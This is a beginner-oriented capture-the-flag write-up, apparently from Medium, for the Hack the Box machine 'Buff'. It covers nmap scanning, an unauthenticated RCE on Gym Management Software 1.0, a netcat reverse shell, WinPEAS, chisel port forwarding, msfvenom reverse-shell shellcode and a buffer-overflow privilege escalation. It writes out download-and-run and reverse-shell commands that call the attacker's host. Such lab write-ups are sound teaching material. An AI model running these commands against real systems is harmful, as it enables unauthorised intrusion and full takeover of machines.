🏋Hack the Box Buff Write-up 🏋

Buff is a machine that is relatively beginner friendly. This write-up is similarly geared towards beginners to Hack the Box(HTB) and Pen-testing/Ethical Hacking in general. Things like hacking phases and what a shell is will be explained more in-depth than the average HTB write-up.

This machine is also great for beginners because it employs techniques that are common in Hack the Box and other vulnerable machine platforms. Things like starting a netcat shell and a python web server is done several times, which is great practice.

Prerequisites

  1. Install a Kali Linux Virtual Machine on your Host, I recommend this guide:

2. To create a HTB account, I recommend this guide. Try creating one on your own for a hour or two first:

3. Then follow the steps to connect to the HTB VPN that is on their web UI:

4. Then reset the Buff machine to ensure that it’s up and running properly.

Now let’s get started…

Enumeration Phase

Lets begin with an nmap scan in your attacking host’s Linux terminal to find the web server running on Buff(10.10.10.198):

nmap [IP address of the target a.k.a. Buff]

nmap 10.10.10.198

What is nmap? nmap is short for Network Mapper. It scans computers to figure out what the computer is, what services the computer is running, and sometimes reveals specific vulnerabilities. The photo above is an example of an nmap scan for the target machine Buff(10.10.10.198). Gaining information about a target machine is as simple as typing nmap then the IP address of the target. In the above scan we find 2 ports open. Ports being open reflect the services available on the target machine.Port 8080 tells us it’s a webserver with the “http” listed under “SERVICE”. Web servers are usually high risk services, so it should be investigated first. For example: port 22 usually runs Secure Shell (SSH) which is considered a low risk service.

Find the program and version # of what the web server was made with.

Why are version numbers important? On the “contact.php” page it reads “Gym Management Software 1.0”. This is key information to research a vulnerability. Version numbers are always extremely important to look out for in the enumeration phase. Different versions of a service can contain different vulnerabilities. These vulnerabilities can be looked up by any search engine.

Looking for a exploit

How to research exploits? Googling is an extremely effective way to research vulnerabilities. The first result gives us an “Unauthenticated Remote Code Execution” vulnerability. Unauthenticated means we don’t need credentials, or a username or password, for the exploit to work. Remote Code Execution(RCE) means we can execute any commands we want on the target that contains this vulnerability. Any RCE vulnerabilities you find on a target you should attempt to use first, because it is most useful to take over a machine when you can run any commands you want on it.

Exploitation Phase

Looking at the exploit code

How do you run the exploit? The author of this exploit explains many things about the vulnerability in the comments. Most important for knowing how to run the vulnerability: he tells us it is written with python. Now we know that we need to use python to run this exploit code.

Downloading the exploit code

Running the exploit code

What is exploit modification? Most public exploits you find, like the one above, will not work “out of the box”. You will need to make a few modifications to the code like change an IP address, or port number, or add in shell code. At the worst you’ll need to install some dependencies, like new python modules, or even modify the logic of the code yourself.

Install a python module manager called pip to download the missing module:

Downloading missing module:

Try again:

Install missing module:

Finally running the exploit:

What is “help” information? Most Linux and other command line programs print help information if you run them without arguments/parameters.

Running exploit with target (Buff(10.10.10.198)) as a parameter for a successful shell:

What is a shell? A “shell” is h@xor slang for for a command line connection on a target. This means you can run commands on a target with all the convenience of a shell connection. To get a shell on a target is the goal in the exploitation phase.

Upgrading shell

We are going to use netcat to execute another shell connection.

Running a web server:

First we download the netcat binary and host it on a web server with a quick Python3 command. We’ll take the netcat binary from the SecLists github repository. This is a great repository for pen-testing wordlists and payloads which you should be visiting often.

https://github.com/danielmiessler/SecLists/blob/master/Web-Shells/FuzzDB/nc.exe

In the same directory that you downloaded nc.exe (netcat) into, start the python web server. I use a couple of bash tricks to do this quickly. First, if you’re on ParrotOS or Kali you’ll have the nc.exe binary on your system by default somewhere, find it with locate nc.exe. Then copy the path to your current directory with cp /path/to/nc.exe . . Finally start the web server with python3 -m http.server.

To figure out what IP address your web server is being hosted on, use the command ip a and find the network that your Hack the Box VPN is running on. Most likely it’s called tun0. The eth0 network is the ip address you have on your local network.

Using your IP address, in this example it’s 10.10.14.22, you can now browse to your web server using any browser. You’ll find it’s hosting the files from the directory you ran the python command in. Now you can download these files from anywhere in the Hack the Box VPN!

We are looking to upload the nc.exe program onto our target. Many windows programs can download files: curl, wget, certutils, powershell. I test to see if curl is on the system by attempting to print some help information : curl -h

It works! Lets use curl to download our nc.exe binary to the target.

curl http://[your.IP.address.here]/nc.exe -o nc.exe

curl http://10.10.14.22/nc.exe -o nc.exe

Executing Netcat shell connection

nc -nlvp 53 <- This command opens port 53 on our attacking host to listen for a connection. We chose port 53 because this is the port for outbound DNS connections. Which Windows always has open. It’s a good rule of thumb to always use port 53 for shells on Windows targets.

Finally, we can execute the shell connection using the following command on your target. Make sure you’re using your own IP address to connect back to:

nc.exe -nv [your.IP.address.here] 4444 -e cmd.exe

nc.exe -nv 10.10.14.2 4444 -e cmd.exe

You should receive a fully interactive Windows CMD command prompt through your netcat listener on your attacking host.

Finding user.txt flag

Privilege Escalation Phase

There are many vulnerabilities and misconfigurations to check for a priv-esc vector on a Windows machine. This is why folks made programs like WinPEAS(Windows Privilege Escalation Awesome Scripts) to make looking for these vulnerabilities much easier. When WinPEAS is run on a target, it prints useful info that may lead to the privesc vector and to higher privileges. Here’s the download link:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe

A nifty trick I like to use to quickly download a file to my current directory is to copy the direct download link(like the one above), then download it using wget:

Start a web server in the directory you’ve downloaded winPEAS.exe onto, in your attacking host:

python3 -m http.server

It’s not absolutely necessary, but just for demo, lets shift into Powershell. Right now we’re working in a DOS Windows command prompt on our Windows target’s shell, we can launch a Powershell session just by typing powershell :

Then on the target, use curl to download the priv-esc script:

curl -o winPEAS.exe http://[your.IP.address.here]:8000/winPEAS.exe

curl -o winPEAS.exe http://10.10.14.2:8000/winPEAS.exe

If you want to execute commands like in command prompt, but you’re stuck in powershell, just prefix the command with cmd.exe /c [command]. We can run the winPEAS.exe program with:

cmd.exe /c winPEAS.exe

Finding an Vulnerability

Under the “Local Address” column, the ports that are open on the Windows target is listed. If you’re a beginner, telling you that port 8888 is odd to see open on a Windows computer probably doesn’t mean much, because everything looks odd and new.

For more context, port 135 and 445 are common on Windows machines because they run SMB(Server Message Block), a common file sharing Windows service:

Port 3306 is not uncommon because it’s the port it runs SQL, a database service:

However you rarely see port 8888 open, having this perception comes with experience from hacking more boxes! Seeing things that look odd and out of place is what finding vulnerabilities is all about.

We know it’s a Windows computer and we know a strange port is open: 8888. This is enough to start researching a priv-esc vulnerability!

We’ve found a pretty enticing exploit. A buffer overflow exploit usually leads to full control of a system.

Port Forwarding

This means port 8888 is open on localhost, this means it’s only open to the internal system. This is why port 8888 didn’t pop up on our nmap scans, which were scanning from outside the system.

In order to make it easier for our exploit to reach our Windows target on port 8888, we’re going to port forward port 8888 to our attacking host. This means we’re going to set up a connection so that port 8888 on the Windows machine is locally accessible on our attacking host.

Chisel

https://github.com/jpillora/chisel/releases/download/v1.7.0-rc9/chisel_1.7.0-rc9_windows_386.gz

Use wget to download it to your attacking host:

Then use gunzip to quickly decompress the program:

I’m going to rename the chisel binary, with mv, to chisel.exe just for ease of use:

Now start a web server so we can download chisel to the windows targe:

python3 -m http.server

Then on the Windows target with powershell, download with curl:

curl -o chisel.exe http://[your.IP.address.here]:8000/chisel.exe

curl -o chisel.exe http://10.10.14.22:8000/chisel.exe

You can switch back to Windows CMD command line just by typing cmd.exe, this makes it simpler to run the chisel.exe program.

Before we establish a port forward with chisel.exe on the Windows target, we need a chisel program on our attacking host to act as a server that connects us to the port forward. Download the Linux version of chisel with this link:

https://github.com/jpillora/chisel/releases/download/v1.7.0-rc9/chisel_1.7.0-rc9_linux_amd64.gz

Decompress again, then rename to lin_chisel for clarity:

Make the binary executable:

This command starts a chisel server on your attacking host listening on port 9000:

./lin_chisel server -p 9000 -reverse -v

Back to your Windows shell, execute chisel.exe in CMD command line with the following command. This command launches a port forward to your attacking host, opening port 8888 on the Windows target to localhost on your attacking host. You will be able to access port 8888 on the Windows target though port 8888 that is open on your host.

chisel.exe client [your.ip.address.here.]:9000 R:8888:127.0.0.1:8888

chisel.exe client 10.10.14.22:9000 R:8888:127.0.0.1:8888

Confirm that port 8888 is open on your attacking host by using netstat:

Generating Shellcode

Lets generate shellcode with the following command:

msfvenom -p windows/shell_reverse_tcp LHOST=[your.IP.address.here] LPORT=4433 -f c

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.22 LPORT=4433 -f c

The -p flag designates the payload.

LHOST is the IP address for the shellcode to phone home to, which should be your attacking hosts IP.

LPORT tells what port to phone home to. The port I picked was arbitrary, since you can open any port to listen in on with nc on your attacking host.

-f c tells msfvenom to print the shellcode in a c code format.

Running the Priv-esc Exploit:

Open the exploit in a text editor.

Replace all the hex in the shellcode variable parentheses with the shellcode you generated using msfvenom.

Run another netcat listener to catch our shell connection with on your attacking host:

nc -nvlp 4433

Run the exploit with python. It it already written in the code to point the exploit to localhost on port 8888, which is exactly where we port forwarded the vulnerable Windows service to:

You should receive a shell back on netcat with administrative privileges:

Finding root.txt flag

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store